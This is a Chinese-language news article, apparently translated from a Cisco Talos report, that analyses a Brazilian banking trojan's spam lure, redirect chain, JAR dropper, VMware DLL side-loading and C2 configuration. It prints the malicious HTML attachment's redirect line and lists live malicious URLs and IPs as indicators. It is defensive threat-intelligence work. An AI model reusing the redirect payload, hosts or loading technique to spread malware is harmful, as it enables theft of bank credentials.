黑客新聞:銀行木馬利用VMvare進行傳播
背景介紹
銀行木馬與每個人的日常生活息息相關,可能會對每個人造成直接的經濟損失。思科的研究團隊Talos近日發現一起針對對南美巴西的銀行木馬活動。該木馬活動的對象主要是南美的銀行,通過竊取用戶的證書來非法獲利。除了針對巴西用戶外,還嘗試用重定向等方法來感染用戶的計算機。令人意外的是,該木馬使用了多重反逆向分析技術,而且最終的payload是用Delphi編寫的,而Delphi在銀行木馬中並不常見。
感染傳播Infection Vector
垃圾郵件
與大多數銀行木馬活動類似,該木馬首先利用惡意垃圾郵件進行傳播。攻擊者使用的郵件是用葡萄牙語寫的,看起來更加真實,收到惡意郵件的人更容易打開惡意附件。
該郵件含有一個名為BOLETO_2248_.html的附件,BOLETO是巴西使用的一種發票。這個HTML文件含有一個簡單的重定向:
<html><head><title>2Via Boleto</title></head><body></body></html><meta http-equiv="refresh" content="0; url=http://priestsforscotland.org.uk/wp-content/themes/blessing/0032904.php">
重定向
HTML附件中的URL會重定向到goo.gl;然後goo.gl再重定向到 http://thirdculture.tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar;最後,重定向的鏈接會指向一個名為BOLETO_09848378974093798043.jar的JAR文件。如果用戶雙擊該JAR文件,Java就會執行惡意代碼並開始安裝銀行木馬。
Java執行
Java代碼執行的第一步是設定惡意軟件運行的工作環境,從 http://104.236.211.243/1409/pz.zip 下載需要的其他文件。惡意軟件工作在C:\Users\Public\Administrator\ directory目錄下。然後,Java代碼會重命名下載的二進制文件,執行之前重命名的vm.png。
惡意軟件加載
首先執行的二進制文件是vm.png,這是經過VMvare簽名的合法的二進制文件。
依賴的二進制文件之一是vmwarebase.dll:
Python 2.7.12 (default, Nov 19 2016, 06:48:10)[GCC 5.4.0 20160609] on linux2Type "help", "copyright", "credits" or "license" for more information.>>> import pefile>>> pe = pefile.PE("vm.png")>>> for entry in pe.DIRECTORY_ENTRY_IMPORT:... print entry.dll...MSVCR90.dllADVAPI32.dllvmwarebase.DLLKERNEL32.dllvmwarebase.dll是惡意的二進制代碼而不是合法文件,其他攻擊者使用的技術有PlugX。PlugX背後的理念是:一些安全產品的可信鏈是這樣的,如果一個二進制文件是可信的(本文中的vm.png),那麼它所加載的庫默認是可信的。這種加載技術可以繞過一些安全檢查。
vmwarebase.dll 代碼的作用是注入和執行 explorer.exe或者 notepad.exe中的prs.png代碼。注入是通過遠程進程的內存分配和加載gbs.png庫的LoadLibrary()來執行的。API的使用是通過AES加密來混淆的。
解密結果為
m5ba+5jOiltH7Mff7neiMumHl2s= 是LoadLibraryA
QiF3gn1jEEw8XUGBTz0B5i5nkPY=是kernel32.dll。
銀行木馬
該木馬的主要模塊含有一系列的特徵。比如,會嘗試終止如taskmgr.exe,msconfig.exe, regedit.exe ,ccleaner.exe , ccleaner64.exe這類程序。該模塊會用HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base這樣看似合法的名字進行註冊表登記。
有模塊可以獲取用戶當前窗口的名字,目的是確認用戶是否有下面列表中名字的窗口。
Navegador ExclusivoSicoobnetAplicativo ItaInternet Banking BNBBanestes Internet BankingBanrisulbb.com.brbancobrasil.comBanco do BrasilAutoatendimento Pessoa Física - Banco do BrasilinternetbankingcaixaCaixa - A vida pede mais que um bancoSICREDIBanco Bradesco S/AInternet Banking30 horasBanestes Internet BankingBanrisul
這個列表包含了位於巴西的所有目標金融機構,木馬注入可以允許他們與銀行網站進行交互。主模塊的另一個任務是用rundll32.exe執行最後的二進制文件gps.png。
該庫使用Themida進行封裝,導致很難進行解封。
下面的debug字符串是我們在樣本中發現的,這些字符串是葡萄牙語的:
<|DISPIDA|>Iniciou!<|PRINCIPAL|><|DISPIDA|>Abriu_IE<|Desktop|><|DISPIDA|>Startou!<|Enviado|>
當受感染的主機執行特定操作的時候,這些字符串就會被髮送給C2服務器。C2的配置在i.dk純文本文件中,該文件使用AES256加密。包含有日期,IP和其他配置項目,如下:
07082017191.252.65.1396532
結論
銀行木馬也是安全威脅的一部分,而且在不斷髮展。經濟回報是攻擊者的主要動因,也是惡意軟件持續發展的原因之一,Themida這樣的商業封裝軟件使對惡意軟件的分析變得越來越難,而且這種趨勢還在不斷髮展。
IOCs
927d914f46715a9ed29810ed73f9464e4dadfe822ee09d945a04623fa3f4bc10 HTML attachment5730b4e0dd520caba11f9224de8cfd1a8c52e0cc2ee98b2dac79e40088fe681c RAR archiveB76344ba438520a19fff51a1217e3c6898858f4d07cfe89f7b1fe35e30a6ece9 BOLETO_09848378974093798043.jar0ce1eac877cdd87fea25050b0780e354fe3b7d6ca96c505b2cd36ca319dc6cab gbs.png6d8c7760ac76af40b7f9cc4af31da8931cef0d9b4ad02aba0816fa2c24f76f10 i.dk
56664ec3cbb228e8fa21ec44224d68902d1fbe20687fd88922816464ea5d4cdf prs.png641a58b667248fc1aec80a0d0e9a515ba43e6ca9a8bdd162edd66e58703f8f98 pz.zip79a68c59004e3444dfd64794c68528187e3415b3da58f953b8cc7967475884c2 vm.png969a5dcf8f42574e5b0c0adda0ff28ce310e0b72d94a92b70f23d06ca5b438be vmwarebase.dllhttp://priestsforscotland.org.ukhttp://thirdculture.tv:http://104.236.211.243191.252.65.139
相關推薦
